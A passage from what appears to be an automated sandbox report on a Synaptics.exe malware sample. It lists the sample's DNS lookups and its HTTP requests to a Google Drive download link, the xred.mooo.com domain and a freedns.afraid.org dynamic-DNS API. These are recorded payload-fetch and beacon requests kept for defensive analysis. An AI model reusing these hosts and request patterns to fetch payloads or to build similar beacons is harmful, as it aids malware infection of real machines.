                                                                                                                                                                                                                          May 27, 2022 04:38:30.791366100 CEST804973969.42.215.252192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:30.791500092 CEST4973980192.168.2.369.42.215.252
                                                                                                                                                                                                                          May 27, 2022 04:38:45.604988098 CEST804973969.42.215.252192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:45.605108976 CEST4973980192.168.2.369.42.215.252
                                                                                                                                                                                                                          May 27, 2022 04:38:48.801315069 CEST49778443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:48.801353931 CEST44349778172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:48.805114031 CEST49777443192.168.2.3172.217.168.14
                                                                                                                                                                                                                          May 27, 2022 04:38:48.805186987 CEST44349777172.217.168.14192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:51.627587080 CEST4973980192.168.2.369.42.215.252
                                                                                                                                                                                                                          May 27, 2022 04:38:51.628154039 CEST49778443192.168.2.3172.217.168.14

                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          May 27, 2022 04:38:14.407345057 CEST5742153192.168.2.38.8.8.8
                                                                                                                                                                                                                          May 27, 2022 04:38:14.432918072 CEST53574218.8.8.8192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:14.756045103 CEST6535853192.168.2.38.8.8.8
                                                                                                                                                                                                                          May 27, 2022 04:38:14.775238991 CEST53653588.8.8.8192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:15.064286947 CEST4987353192.168.2.38.8.8.8
                                                                                                                                                                                                                          May 27, 2022 04:38:15.081877947 CEST53498738.8.8.8192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:20.406763077 CEST6526653192.168.2.38.8.8.8
                                                                                                                                                                                                                          May 27, 2022 04:38:20.426251888 CEST53652668.8.8.8192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:21.686239004 CEST6333253192.168.2.38.8.8.8
                                                                                                                                                                                                                          May 27, 2022 04:38:21.703108072 CEST53633328.8.8.8192.168.2.3
                                                                                                                                                                                                                          May 27, 2022 04:38:24.114582062 CEST5139153192.168.2.38.8.8.8
                                                                                                                                                                                                                          May 27, 2022 04:38:24.133409977 CEST53513918.8.8.8192.168.2.3

                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                          May 27, 2022 04:38:14.407345057 CEST192.168.2.38.8.8.80xc6a6Standard query (0)docs.google.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                          May 27, 2022 04:38:14.756045103 CEST192.168.2.38.8.8.80x3c43Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                          May 27, 2022 04:38:15.064286947 CEST192.168.2.38.8.8.80x7d91Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                                          May 27, 2022 04:38:20.406763077 CEST192.168.2.38.8.8.80x1c79Standard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                          May 27, 2022 04:38:21.686239004 CEST192.168.2.38.8.8.80x317cStandard query (0)xred.mooo.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                          May 27, 2022 04:38:24.114582062 CEST192.168.2.38.8.8.80xae03Standard query (0)xred.mooo.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                          May 27, 2022 04:38:14.432918072 CEST8.8.8.8192.168.2.30xc6a6No error (0)docs.google.com172.217.168.14A (IP address)IN (0x0001)
                                                                                                                                                                                                                          May 27, 2022 04:38:14.775238991 CEST8.8.8.8192.168.2.30x3c43Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                          May 27, 2022 04:38:15.081877947 CEST8.8.8.8192.168.2.30x7d91No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)
                                                                                                                                                                                                                          May 27, 2022 04:38:20.426251888 CEST8.8.8.8192.168.2.30x1c79Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                          May 27, 2022 04:38:21.703108072 CEST8.8.8.8192.168.2.30x317cName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                          May 27, 2022 04:38:24.133409977 CEST8.8.8.8192.168.2.30xae03Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                          • docs.google.com
                                                                                                                                                                                                                          • freedns.afraid.org

                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          0192.168.2.349736172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          1192.168.2.349737172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          10192.168.2.349751172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          11192.168.2.349752172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          12192.168.2.349753172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          13192.168.2.349754172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          14192.168.2.349756172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          15192.168.2.349759172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          16192.168.2.349760172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          17192.168.2.349761172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          18192.168.2.349762172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          19192.168.2.349763172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          2192.168.2.349741172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          20192.168.2.349764172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          21192.168.2.349765172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          22192.168.2.349766172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          23192.168.2.349767172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          24192.168.2.349768172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          25192.168.2.349769172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          26192.168.2.349771172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          27192.168.2.349772172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          28192.168.2.349773172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          29192.168.2.349776172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          3192.168.2.349742172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          30192.168.2.349777172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          31192.168.2.34973969.42.215.25280C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          May 27, 2022 04:38:15.388402939 CEST945OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                                                                                          User-Agent: MyApp
                                                                                                                                                                                                                          Host: freedns.afraid.org
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          May 27, 2022 04:38:15.603662968 CEST950INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:13 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          X-Cache: MISS
                                                                                                                                                                                                                          Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          4192.168.2.349743172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          5192.168.2.349744172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          6192.168.2.349745172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          7192.168.2.349747172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          8192.168.2.349749172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          9192.168.2.349750172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          0192.168.2.349736172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:15 UTC0OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:15 UTC0INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:15 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-4bAlBbOaiT_hTXvvmYwNRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:15 UTC1INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 78 34 78 4a 54 5a 42 6a 61 36 31 6b 59 5f 5f 45 63 34 54 36 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fx4xJTZBja61kY__Ec4T6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:15 UTC3INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:15 UTC3INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          1192.168.2.349737172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:15 UTC0OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:15 UTC3INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:15 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-vpJfeg6kjn4Ijj-MdmjgMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:15 UTC4INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 44 49 61 4d 72 59 43 47 79 32 42 69 79 74 71 52 2d 5a 51 37 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WDIaMrYCGy2BiytqR-ZQ7g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:15 UTC6INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:15 UTC6INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          10192.168.2.349751172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC28OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC31INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:21 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-7x-dDGPCK1jzWlmJAVXdXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC32INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 4c 71 6a 4c 41 77 6e 55 54 57 56 62 6d 77 43 52 33 6d 34 44 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xLqjLAwnUTWVbmwCR3m4Dg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
